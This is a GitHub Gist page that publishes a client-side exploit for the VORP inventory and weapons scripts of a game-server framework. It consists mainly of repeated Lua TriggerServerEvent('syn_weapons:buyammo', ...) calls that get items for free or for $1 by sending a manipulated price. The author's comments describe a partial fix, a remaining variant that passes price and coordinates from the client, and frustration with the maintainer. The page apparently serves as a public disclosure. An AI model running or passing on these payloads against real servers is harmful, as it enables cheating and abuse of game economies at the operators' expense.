Created
July 1, 2024 09:04
-
-
Save draobrehtom/aed368561f2e4174e92464f606daef99 to your computer and use it in GitHub Desktop.
VORP Inventory Item Exploit - from 01.07.2024
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| TriggerServerEvent('syn_weapons:buyammo', 'water', 0, 1, 'Water') | |
| TriggerServerEvent('syn_weapons:buyammo', 'water', 0, 1, 'Water') | |
| TriggerServerEvent('syn_weapons:buyammo', 'water', 0, 1, 'Water') | |
| TriggerServerEvent('syn_weapons:buyammo', 'water', 0, 1, 'Water') | |
| TriggerServerEvent('syn_weapons:buyammo', 'water', 0, 1, 'Water') | |
| TriggerServerEvent('syn_weapons:buyammo', 'water', 0, 1, 'Water') | |
| TriggerServerEvent('syn_weapons:buyammo', 'water', 0, 1, 'Water') | |
| -- Be careful, or you might flood your script with water |
Author
Author
TriggerServerEvent('syn_weapons:buyammo', {price=1, item='water'}, 'Water', {Pos=GetEntityCoords(PlayerPedId())}, 1, 'Stepping on the same rake over and over again.')
Author
It's finally fixed
Author
It's interesting how the maintainer first decided to ignore the issue when it was mentioned in this thread:
here
Only after yesterday's drama on CFX discord something started is going on here.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment

Partly it was fixed from next commit: VORPCORE/vorp_weaponsv2@e0676b0
But you can still exploit it by passing needed parameters from client to server like item price and ped coordinates. As the result you can buy any item just for $1 each.